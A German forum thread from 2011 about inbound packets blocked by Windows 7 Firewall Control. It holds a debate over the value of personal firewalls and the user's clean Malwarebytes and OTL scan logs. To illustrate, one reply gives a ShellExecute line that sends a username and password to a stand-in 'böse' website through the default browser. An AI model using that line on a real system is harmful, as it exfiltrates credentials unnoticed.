Firewall7Control "WSH Default Inbound Block Incoming"

N33DH33LP · 05.09.2011, 14:17

Ich habe auf meinem Win7 64Bit Betriebssystem Windows 7 Firewall Control installiert und in letzter Zeit bekomme ich ständig die Meldung, dass bestimmte Datenpakete geblockt werden:

Bei google habe ich dazu nichts gefunden. Die IP und der Port ändern sich auch ständig.
Einmal kamen sogar 600 Anfragen hintereinander, die geblockt wurden.
In meinem Router sind auch keine Ports offen.
Diese Pakete werden selbst geblockt, wenn ich die Firewall auf "ErlaubeAlle" einstelle.
Ich habe den Verdacht, dass jemand versucht mich anzugreifen. (Z.b mit nem Exploit SuchTool oder ähnlichem...)

Hat jemand Ahnung, was diese geblockten Ereignisse bedeuten, ob die irgendwie eine Gefahr darstellen können und wie man diese Verhindern kann?

cosinus · 05.09.2011, 15:10

Zitat:

In meinem Router sind auch keine Ports offen.

Dann gibt es auch keine Angriffspunkte.
Wozu Win7FirewallControl? Belass es bei der "einfachen" Windows-Firewall ohne die ziemlich sinnfreie Überwachung ausgehender Verbindung.

Zitat:

Ich habe den Verdacht, dass jemand versucht mich anzugreifen. (Z.b mit nem Exploit SuchTool oder ähnlichem...)

Wie soll das gehen wenn der Router schon alles filtert? Wie gesagt, wenn der Router schon so eingestellt ist und kein Port weitergeleitet wird und damit "offen" wäre, gibt es schon damit keinen Angriffspunkt, man könnte sich in diesem Szenario die Windows-Firewall komplett sparen.

N33DH33LP · 05.09.2011, 15:24

Eine Personal Firewall ist für mich auf jeden Fall unabdingbar.
Zum einen, da sie Sicherheit vor der meisten Maleware bietet. (Ja man kann sich auch infizieren ohne dubiose Programme zu installieren, Stichwort Drive By, Browser Exploits usw. bei 0day Exploits ist nämlich selbst die brain.exe nutzlos...).
Außerdem möchte ich bestimmten eigentlich Vertrauenswürdigen Programmen keine Internetverbindung erlauben, wenn diese nicht Nötig ist. Es gibt nämlich viele noch sooo vertrauenswürdige Programme (z.B Apple...) die dann doch viele Private Informationen mit dem Internet austauschen.

Naja, 100% ist der Router ja nicht geschlossen, ich habe halt keine Extra Portforwarding Regeln erstellt, aber die Standart Ports sind ja alle Offen, ansonsten würde ja gar keine Internetverkehr statt finden. Trojaner benötigen beispielsweise ja auch keine extra geöffneten Ports am Router um funktionieren.

Ich verstehe auch nicht wirklich wie diese IPs unter Ports wie z.B 40026 es überhaupt schaffen bis zu meinen Rechner zu gelangen.
Und so wie ich die Meldung verstehe versuchen die Verbindungen auf den Hostprozess für Windows Dienste zuzugreifen. Dies bringt mich aber auch nicht viel weiter...

cosinus · 05.09.2011, 15:34

Zitat:

Eine Personal Firewall ist für mich auf jeden Fall unabdingbar.
Zum einen, da sie Sicherheit vor der meisten Maleware bietet.

Auweia, das erste was Schädlinge versuchen, ist die PFW auszuknippsen. Im Grunde ist es schon viel zu spät wenn Malware es ins System geschafft hat, dann hilft die PFW nur mit sehr sehr viel Glück noch. Und wie du siehst stört sie im normalen Betrieb doch mehr als sie hilft.

Zitat:

(Ja man kann sich auch infizieren ohne dubiose Programme zu installieren, Stichwort Drive By, Browser Exploits usw. bei 0day Exploits ist nämlich selbst die brain.exe nutzlos...).

Schonmal was von anderen Maßnahmen wie eingeschränkte Rechte, Browserplugins wie NoScript oder einer Sandbox gehört?
Eine PFW verhindert KEINE Infektion!

Zitat:

Außerdem möchte ich bestimmten eigentlich Vertrauenswürdigen Programmen keine Internetverbindung erlauben, wenn diese nicht Nötig ist. Es gibt nämlich viele noch sooo vertrauenswürdige Programme (z.B Apple...) die dann doch viele Private Informationen mit dem Internet austauschen.

Warum installierst und nutzt du überhaupt Programme, wenn sie nicht vertrauenswürdig sind?

Zitat:

Naja, 100% ist der Router ja nicht geschlossen, ich habe halt keine Extra Portforwarding Regeln erstellt, aber die Standart Ports sind ja alle Offen, ansonsten würde ja gar keine Internetverkehr statt finden.

Sry, aber diese Aussage ist absoluter Quatsch.
Wenn kein Portforwarding einegrichtet ist, ist kein Port "offen", sprich der Router verwirft alle Anfragen. Welche "Standdardports" sollen da offen sein? Um zu Surfen muss deiner Rechner oder Router keinen Port forwarden bzw. Dienst anbieten!

Zitat:

Ich verstehe auch nicht wirklich wie diese IPs unter Ports wie z.B 40026 es überhaupt schaffen bis zu meinen Rechner zu gelangen.

Du solltest dich eingehender mit TCP/IP beschäftigen, ohne Wissen wird es nichtmal ansatzweise was mit der Firewall-Konfig.

N33DH33LP · 05.09.2011, 16:39

Zitat:

Zitat von cosinus

Auweia, das erste was Schädlinge versuchen, ist die PFW auszuknippsen. Im Grunde ist es schon viel zu spät wenn Malware es ins System geschafft hat, dann hilft die PFW nur mit sehr sehr viel Glück noch. Und wie du siehst stört sie im normalen Betrieb doch mehr als sie hilft.

Naja die PFW kann nur mit Prozess Injection umgangen werden und von meinen Erfahrungen her gibt es genügend Maleware, die keine PJ benutzt und so eine PFW viel verhindern kann.

Zitat:

Zitat von cosinus

Schonmal was von anderen Maßnahmen wie eingeschränkte Rechte, Browserplugins wie NoScript oder einer Sandbox gehört?
Eine PFW verhindert KEINE Infektion!

Das diese keine Infektion verhindert ist mir klar, NoScript benutze ich auch, und wenn ich auf dubiosen Seiten surfe oder so kommt sowieso immer eine VM zum einsatzt. Jedoch fühle ich mich einfach Sicherer, wenn ich weiß was für Daten aus meinen PC gelangen und welche hinein gelangen. Bzw. wenn ich weiß welche Prozesse Daten rein und rausschicken dürfen.

Zitat:

Zitat von cosinus

Warum installierst und nutzt du überhaupt Programme, wenn sie nicht vertrauenswürdig sind?

Naja da ich ein Mensch bin der niemanden vertraut und es deswegen keine vertrauenswürdigen Programme für mich gibt. Und deswegen komme ich nicht dadran vorbei solche unvertrauenswürdigen Programme wie iTunes für meinen IPod zu installieren. Deswegen brauche ich eine PFW um solchen Programmen die Internetverbindung zu verbieten. Selbst Windows schickt teilweise Informationen unbemerkt durchs Internet...

Zitat:

Zitat von cosinus

Sry, aber diese Aussage ist absoluter Quatsch.
Wenn kein Portforwarding einegrichtet ist, ist kein Port "offen", sprich der Router verwirft alle Anfragen. Welche "Standdardports" sollen da offen sein? Um zu Surfen muss deiner Rechner oder Router keinen Port forwarden bzw. Dienst anbieten!

Ok, bin kein Experte in der Router Funktionsweise, ich dachte der Router hat für bestimmte Standard Internet Dienste bestimmte Standard Ports offen, wie z.B zum Surfen den Port 80. Aber anscheinend ist es so, dass alle Datenpakete, die von meinem Rechner ausgehen ohne Ausnahme durch den Router gelassen werden und dadurch dann eine Verbindung aufgebaut wird, über diese der Router dann auch Pakete empfangen kann und an mich weiterleiten. Und alle Anfragen die richtung Router gehen, ohne das eine Verbindung aufgebaut ist werden auf Grund der NAT blockiert, oder liege ich da falsch?

Zitat:

Zitat von cosinus

Du solltest dich eingehender mit TCP/IP beschäftigen, ohne Wissen wird es nichtmal ansatzweise was mit der Firewall-Konfig.

Bei der Windows 7 Firewall Controll wird mir weiteres TCP/IP wissen nicht viel bringen, da ich nur Prozesse erlauben oder verbieten kann... Jedoch würde mich das Thema interessieren.

B2T: eigentlich geht es mir darum, zu wissen was diese Fehlermeldung bedeutet und wie ich es herausfinden kann. So wie es aussieht, müsste ja ein Windows Dienst versuchen eine Internetverbindung aufzubauen und die PFW blockt dann alle eingehenden Datenpakete. Wenn das so ist würde ich gerne wissen welche Dienst es ist... und wieso ich selbst mit der Funktion "ErlaubeAlle" diese Datenpakete weiterhin blockiere...

cosinus · 05.09.2011, 20:36

Zitat:

Naja die PFW kann nur mit Prozess Injection umgangen werden

Naja, es gibt auch einfachere Tricks. Eingehenden Traffic, zum Filtern von "offenen" Ports, daist der Router ja schon die Barriere.
Ausgehenden Traffic kannst du nicht zuverlässig blockieren.

Mit

Code:

ATTFilter

ShellExecute(NULL, "open","http://www.poehseseite.com/?var1=$username&var2=$password", NULL,NULL, SW_HIDE);

Kann man im default Browser "sensible" Daten von einer "bösen" Seite aufrufen. Die PFW wird davon nichts mitbekommen, es sei denn bei JEDEM Traffic wirst du um Erlaubnis gefragt, aber das tut sich keiner an diese Klickorgie. Oder nickst du jede Verbindungsanfrage vom Firefox, Opera oder IE manuell ab?

=> Use ShellExecute to launch the default Web browser

Zitat:

Jedoch fühle ich mich einfach Sicherer, wenn ich weiß was für Daten aus meinen PC gelangen und welche hinein gelangen. Bzw. wenn ich weiß welche Prozesse Daten rein und rausschicken dürfen.

Gefühlte, vorgetäuschte "Sicherheit" durch eine PFW ist sinnfrei und gefährlich.
Also ich halte von solchen Spielerien wenig bis garnichts, v.a. wenn man schon einen Router hat, braucht man sich nun wirklich nicht mit zusätzlicher Software das System zu verhunzen. Nun gut, nun mag Win7 Firewall Control auf der Windows-Firewall aufbauen, dennoch liegt da die Gefahr hoch, ständig mit nervenden Meldungen überschüttet zu werden.

Lies einfach mal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de

Zitat:

Naja da ich ein Mensch bin der niemanden vertraut und es deswegen keine vertrauenswürdigen Programme für mich gibt. Und deswegen komme ich nicht dadran vorbei solche unvertrauenswürdigen Programme wie iTunes für meinen IPod zu installieren. Deswegen brauche ich eine PFW um solchen Programmen die Internetverbindung zu verbieten. Selbst Windows schickt teilweise Informationen unbemerkt durchs Internet...

Wer Apple nicht traut, sollte auch nicht unbedingt Produkte von ihnen nicht kaufen. Trotzdem wird es gemacht

Und wie bereits oben erwähnt, kannst du damit eben NICHT zuverlässig die Kommunikation nach außen hin kontrollieren oder verbieten.
Wenn du meinst Windows schickt "unbemerkt" Infos durchs Internet - welche Art von Infos sollen das sein? Wenn du glaubst, MS verletzt deine Privatssphäre und spioniert dich aus, warum hast du nicht schon längst Windows durch ein quelloffenes Betriebssystem ersetzt?

Zitat:

Ok, bin kein Experte in der Router Funktionsweise, ich dachte der Router hat für bestimmte Standard Internet Dienste bestimmte Standard Ports offen, wie z.B zum Surfen den Port 80.

Ja, Port 80 - und nicht nur dieser - ist ausgehend erlaubt. Das hat nichts damit zu tun, wenn du zB einen Apache auf deinen Rechner laufen hast, ist dieser nicht automatisch aus dem Internet erreichbar, dazu muss ein Portforwarding im Router eingestellt sein.
Auf dem Router selbst sollte Port 80 nur intern geöffnet sein, es sei denn man konfiguriert den Router so, dass seine webbrowserbasierte Konfigseite auch aus dem Internet erreichbar ist.

Zitat:

über diese der Router dann auch Pakete empfangen kann und an mich weiterleiten. Und alle Anfragen die richtung Router gehen, ohne das eine Verbindung aufgebaut ist werden auf Grund der NAT blockiert, oder liege ich da falsch?

Genau das ist ja auch Sinn und Zweck eines Routers. Hat aber immer noch nichts damit zu tun, dass ein lauschender Dienst nur dadurch erreichbar ist, wie gesagt muss ein Portforwarding eingerichtet werden, falls du meinst es wäre irgendeine Art "Risiko".

Zitat:

B2T: eigentlich geht es mir darum, zu wissen was diese Fehlermeldung bedeutet und wie ich es herausfinden kann. So wie es aussieht, müsste ja ein Windows Dienst versuchen eine Internetverbindung aufzubauen und die PFW blockt dann alle eingehenden Datenpakete. Wenn das so ist würde ich gerne wissen welche Dienst es ist... und wieso ich selbst mit der Funktion "ErlaubeAlle" diese Datenpakete weiterhin blockiere...

Bei "Hostprozess für Windows-Dienste" kann es sich eigentlich nur um svchost.exe handeln. Den zu blockieren macht genau Null Sinn, da er ein Hüllenprozess für im Grunde andere Dienste jeder Art darstellt. Wenn du den blockierst - und mehr kannst du ja anscheinend nicht, wenn du nur prozessabbildnamenbasierte Regeln erstellen kannst - können sehr viele legitime Windows-Dienste logischerweise auch nicht mehr über das Internet kommunizieren.

N33DH33LP · 05.09.2011, 22:18

Zitat:

Zitat von cosinus

Nun gut, nun mag Win7 Firewall Control auf der Windows-Firewall aufbauen, dennoch liegt da die Gefahr hoch, ständig mit nervenden Meldungen überschüttet zu werden.

Naja, ich bekomme vllt einmal im Monat, wenn ich mal etwas installiere ne Meldung und wirklich viel Ressourcen verbraucht die PFW nicht, ich kann mich also nicht über Nachteile, dieser PFW beschweren.

Zitat:

Zitat von cosinus

Lies einfach mal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de

Ok, dass PFWs keine Wirkliche Sicherheit vor Malware bringen hab ich jetzt auch verstanden, aber das ist ja auch nicht der einige Grund, warum ich eine PFW benutze.

Zitat:

Zitat von cosinus

Wer Apple nicht traut, sollte auch nicht unbedingt Produkte von ihnen nicht kaufen. Trotzdem wird es gemacht

Ich vertraue Apple schon soweit, dass sie nur das machen was sie in ihren 100k Seiten Geschäftsbedingungen einem versuchen auf möglichst umständliche Weise zu erklären. Außerdem gibt es fast keine Firmen mehr die gar keine Nutzer Aktivitäten zur Vermarktung abspeichern.
Außerdem kann es ja auch mal passieren, dass man bei einem kostenpflichtigen Programm "ausversehen" einen falschen Serial-Code eingibt der dennoch funktioniert und auf Grund der Datenübermittlung zwischen diesem Programm und dem Unternehmen rechtliche Probleme bekommt.

Zitat:

Zitat von cosinus

Und wie bereits oben erwähnt, kannst du damit eben NICHT zuverlässig die Kommunikation nach außen hin kontrollieren oder verbieten.
Wenn du meinst Windows schickt "unbemerkt" Infos durchs Internet - welche Art von Infos sollen das sein? Wenn du glaubst, MS verletzt deine Privatssphäre und spioniert dich aus, warum hast du nicht schon längst Windows durch ein quelloffenes Betriebssystem ersetzt?

Ich glaube nun nicht, dass MS irgendwelche Privaten Bilder oder meine Keyloggs oder so durchs Internet schickt. Aber ich glaube, dass bestimmte Dienste eindeutige Signaturen durchs Internet schicken, die bei Benutzung von Tor oder eines VPN Servers die Anonymität gefährden, da trotz wechselnder IP Kaskade am Ende immer bestimmte Datenpakete versendet werden, die sich jedes auf eine gewisse Art und Weise ähneln, so dass daraus wieder ein bestimmtes Profil zusammen gesetzt wird, welches wie eine IP Adresse fungiert.

Ich bin zur Zeit auch dabei mich ein wenig in Linux einzuarbeiten, aber ein schneller Umstieg fällt einem auch nicht ganz einfach wenn man mit Windoof aufgewachsen ist -.-

Zitat:

Zitat von cosinus

Bei "Hostprozess für Windows-Dienste" kann es sich eigentlich nur um svchost.exe handeln. Den zu blockieren macht genau Null Sinn, da er ein Hüllenprozess für im Grunde andere Dienste jeder Art darstellt. Wenn du den blockierst - und mehr kannst du ja anscheinend nicht, wenn du nur prozessabbildnamenbasierte Regeln erstellen kannst - können sehr viele legitime Windows-Dienste logischerweise auch nicht mehr über das Internet kommunizieren.

Windows7 Firewall Controll hat den Prozess svchost.exe Standardmäßig auf "read only" gestellt und etwas ändern kann ich an dieser Einstellung auch nicht.
Selbst wenn ich die Gesamte Firewall auf "ErlaubeAll" stelle, werden die Eingehenden Daten blockiert.
Aber trotz dieser Blockierung funktionieren alle Dienste, die ich benutze einwandfrei.
Kann es sein, dass Malware sich per DLL in die svchost.exe geschrieben hat und so versucht eine Verbindung aufzubauen? Hatte eben 2000 blockierte eingehende Verbindungsversuche.

cosinus · 05.09.2011, 22:26

Zitat:

Aber trotz dieser Blockierung funktionieren alle Dienste, die ich benutze einwandfrei.

Tja...dann würde ich sagen Win7FirewallControl arbeitet nicht sauber und ist buggy

Zitat:

Kann es sein, dass Malware sich per DLL in die svchost.exe geschrieben hat und so versucht eine Verbindung aufzubauen? Hatte eben 2000 blockierte eingehende Verbindungsversuche.

Theoretisch ist das möglich, du hättest normalweise bei einer schadhaft manipulierten svchost.exe noch massive anderer Probleme. Wir können deinen Rechner ja mal "abklopfen"

Bitte nun routinemäßig einen Vollscan mit Malwarebytes machen und Log posten.
Denk daran, dass Malwarebytes vor jedem Scan manuell aktualisiert werden muss!

Falls Logs aus älteren Scans mit Malwarebytes vorhanden sind, bitte auch davon alle posten!

Danach OTL-Custom im normalen Windows-Modus (kein OTLPE!)

CustomScan mit OTL

Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop

Starte bitte die OTL.exe.
Vista und Win7 User mit Rechtsklick "als Administrator starten"
Kopiere nun den Inhalt in die Textbox.

Code:

ATTFilter

netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.
%APPDATA%\*.exe /s
%SYSTEMDRIVE%\*.exe
/md5start
wininit.exe
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
CREATERESTOREPOINT

Schliesse bitte nun alle Programme. (Wichtig)
Klicke nun bitte auf den Quick Scan Button.
Klick auf .
Kopiere nun den Inhalt aus OTL.txt hier in Deinen Thread

N33DH33LP · 06.09.2011, 00:40

Ok hab mal gescanned:

Code:

ATTFilter

Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Datenbank Version: 7660

Windows 6.1.7601 Service Pack 1
Internet Explorer 9.0.8112.16421

06.09.2011 01:33:57
mbam-log-2011-09-06 (01-33-41).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|)
Durchsuchte Objekte: 483267
Laufzeit: 1 Stunde(n), 12 Minute(n), 2 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

OTL Logfile:

Code:

ATTFilter

OTL logfile created on: 06.09.2011 00:26:03 - Run 1
OTL by OldTimer - Version 3.2.27.0     Folder = C:\Users\..\Downloads\Anwendungen
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
4,00 Gb Total Physical Memory | 2,17 Gb Available Physical Memory | 54,41% Memory free
7,90 Gb Paging File | 5,83 Gb Available in Paging File | 73,85% Paging File free
Paging file location(s): c:\pagefile.sys 4000 4000 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 48,74 Gb Total Space | 15,62 Gb Free Space | 32,04% Space Free | Partition Type: NTFS
Drive D: | 397,34 Gb Total Space | 176,70 Gb Free Space | 44,47% Space Free | Partition Type: NTFS
Drive U: | 1397,26 Gb Total Space | 242,43 Gb Free Space | 17,35% Space Free | Partition Type: NTFS
 
Computer Name: .. | User Name: .. | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC -  File not found
PRC - C:\Users\..\Downloads\Anwendungen\OTL.exe (OldTimer Tools)
PRC - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation)
PRC - C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Avira GmbH)
PRC - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe (Acronis)
PRC - C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira GmbH)
PRC - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (Acronis)
PRC - C:\Windows\SysWOW64\wbem\WmiPrvSE.exe (Microsoft Corporation)
PRC - C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Avira GmbH)
PRC - C:\Program Files (x86)\Razer\Copperhead\razerhid.exe ()
PRC - C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
PRC - c:\Program Files (x86)\Acer Bio Protection\BASVC.exe (Egis Technology Inc.)
PRC - c:\Program Files (x86)\Acer Bio Protection\CompPtcVUI.exe (Egis Technology Inc.)
PRC - C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe (Safer Networking Ltd.)
PRC - C:\Program Files (x86)\Razer\Copperhead\razerofa.exe (Razer Inc.)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Program Files (x86)\Acronis\TrueImageHome\Common\ti_managers.dll ()
MOD - C:\Program Files (x86)\OpenVPN\bin\libeay32.dll ()
MOD - C:\Program Files (x86)\OpenVPN\bin\libssl32.dll ()
MOD - C:\Program Files (x86)\OpenVPN\bin\libpkcs11-helper-1.dll ()
MOD - C:\Program Files (x86)\OpenVPN\bin\openvpn.exe ()
MOD - C:\Program Files (x86)\OpenVPN\bin\openvpn-gui-1.0.3.exe ()
MOD - C:\Program Files (x86)\Razer\Copperhead\razerhid.exe ()
MOD - C:\Program Files (x86)\Razer\Copperhead\download.dll ()
 
 
========== Win32 Services (SafeList) ==========
 
SRV:64bit: - (Windows7FirewallService) -- C:\Program Files\Windows7FirewallControl\Windows7FirewallService.exe (Sphinx Software)
SRV:64bit: - (SbieSvc) -- C:\Program Files\Sandboxie\SbieSvc.exe (SANDBOXIE L.T.D)
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (OODefragAgent) -- C:\Program Files\OO Software\Defrag\oodag.exe (O&O Software GmbH)
SRV:64bit: - (UxTuneUp) -- C:\Windows\SysNative\uxtuneup.dll (TuneUp Software)
SRV:64bit: - (AppMgmt) -- C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SRV:64bit: - (O2FLASH) -- C:\Windows\SysNative\drivers\o2flash.exe (O2Micro International)
SRV:64bit: - (XAudioService) -- C:\Windows\SysNative\drivers\XAudio64.exe (Conexant Systems, Inc.)
SRV - (afcdpsrv) -- C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe (Acronis)
SRV - (AntiVirService) -- C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Avira GmbH)
SRV - (AntiVirSchedulerService) -- C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira GmbH)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (AcrSch2Svc) -- C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe (Acronis)
SRV - (avg9wd) -- C:\Program Files (x86)\AVG\AVG9\avgwdsvc.exe (AVG Technologies CZ, s.r.o.)
SRV - (rpcapd) Remote Packet Capture Protocol v.0 (experimental) -- C:\Program Files (x86)\WinPcap\rpcapd.exe (CACE Technologies, Inc.)
SRV - (TuneUp.Defrag) -- C:\Program Files (x86)\TuneUp Utilities 2010\TuneUpDefragService.exe (TuneUp Software)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (SwitchBoard) -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
SRV - (TuneUp.UtilitiesSvc) -- C:\Program Files (x86)\TuneUp Utilities 2010\TuneUpUtilitiesService64.exe (TuneUp Software)
SRV - (UxTuneUp) -- C:\Windows\SysWOW64\uxtuneup.dll (TuneUp Software)
SRV - (ETService) -- C:\Programme\Acer\Empowering Technology\Service\ETService.exe ()
SRV - (IGBASVC) -- c:\Program Files (x86)\Acer Bio Protection\BASVC.exe (Egis Technology Inc.)
SRV - (btwdins) -- C:\Programme\WIDCOMM\Bluetooth Software\btwdins.exe (Broadcom Corporation.)
SRV - (RS_Service) -- C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (Acer Incorporated)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (IAANTMON) Intel(R) -- C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe (Intel Corporation)
SRV - (OMSI download service) -- C:\Program Files (x86)\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe ()
SRV - (SBSDWSCService) -- C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe (Safer Networking Ltd.)
SRV - (MailList Controller) -- c:\program files (x86)\maillist controller\amlcSVC.exe (Arclab Software Technologies)
SRV - (WcesComm) -- C:\Windows\WindowsMobile\wcescomm.dll (Microsoft Corporation)
SRV - (RapiMgr) -- C:\Windows\WindowsMobile\rapimgr.dll (Microsoft Corporation)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (truecrypt) -- C:\Windows\SysNative\drivers\truecrypt.sys (TrueCrypt Foundation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (afcdp) -- C:\Windows\SysNative\drivers\afcdp.sys (Acronis)
DRV:64bit: - (tdrpman273) Acronis Try&Decide and Restore Points filter (build 273) -- C:\Windows\SysNative\drivers\tdrpm273.sys (Acronis)
DRV:64bit: - (timounter) -- C:\Windows\SysNative\drivers\timntr.sys (Acronis)
DRV:64bit: - (avipbb) -- C:\Windows\SysNative\drivers\avipbb.sys (Avira GmbH)
DRV:64bit: - (avgntflt) -- C:\Windows\SysNative\drivers\avgntflt.sys (Avira GmbH)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (sptd) -- C:\Windows\SysNative\drivers\sptd.sys ()
DRV:64bit: - (snapman) -- C:\Windows\SysNative\drivers\snapman.sys (Acronis)
DRV:64bit: - (atikmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (ATI Technologies Inc.)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (vpcvmm) -- C:\Windows\SysNative\drivers\vpcvmm.sys (Microsoft Corporation)
DRV:64bit: - (vpcbus) -- C:\Windows\SysNative\drivers\vpchbus.sys (Microsoft Corporation)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (vpcusb) -- C:\Windows\SysNative\drivers\vpcusb.sys (Microsoft Corporation)
DRV:64bit: - (vpcuxd) -- C:\Windows\SysNative\drivers\vpcuxd.sys (Microsoft Corporation)
DRV:64bit: - (vpcnfltr) -- C:\Windows\SysNative\drivers\vpcnfltr.sys (Microsoft Corporation)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (RdpVideoMiniport) -- C:\Windows\SysNative\drivers\rdpvideominiport.sys (Microsoft Corporation)
DRV:64bit: - (sdbus) -- C:\Windows\SysNative\drivers\sdbus.sys (Microsoft Corporation)
DRV:64bit: - (AvgLdx64) -- C:\Windows\SysNative\drivers\avgldx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (NPF) -- C:\Windows\SysNative\drivers\npf.sys (CACE Technologies, Inc.)
DRV:64bit: - (AvgMfx64) -- C:\Windows\SysNative\drivers\avgmfx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (pwdrvio) -- C:\Windows\SysNative\pwdrvio.sys ()
DRV:64bit: - (pwdspio) -- C:\Windows\SysNative\pwdspio.sys ()
DRV:64bit: - (CVPNDRVA) -- C:\Windows\SysNative\drivers\CVPNDRVA.sys ()
DRV:64bit: - (tap0901) -- C:\Windows\SysNative\drivers\tap0901.sys (The OpenVPN Project)
DRV:64bit: - (copperhd) -- C:\Windows\SysNative\drivers\copperhd.sys (Razer (Asia-Pacific) Pte Ltd)
DRV:64bit: - (ubloxVcp) -- C:\Windows\SysNative\drivers\ubloxVcp.sys (u-blox)
DRV:64bit: - (NETw5s64) Intel(R) -- C:\Windows\SysNative\drivers\NETw5s64.sys (Intel Corporation)
DRV:64bit: - (VClone) -- C:\Windows\SysNative\drivers\VClone.sys (Elaborate Bytes AG)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (btwaudio) -- C:\Windows\SysNative\drivers\btwaudio.sys (Broadcom Corporation.)
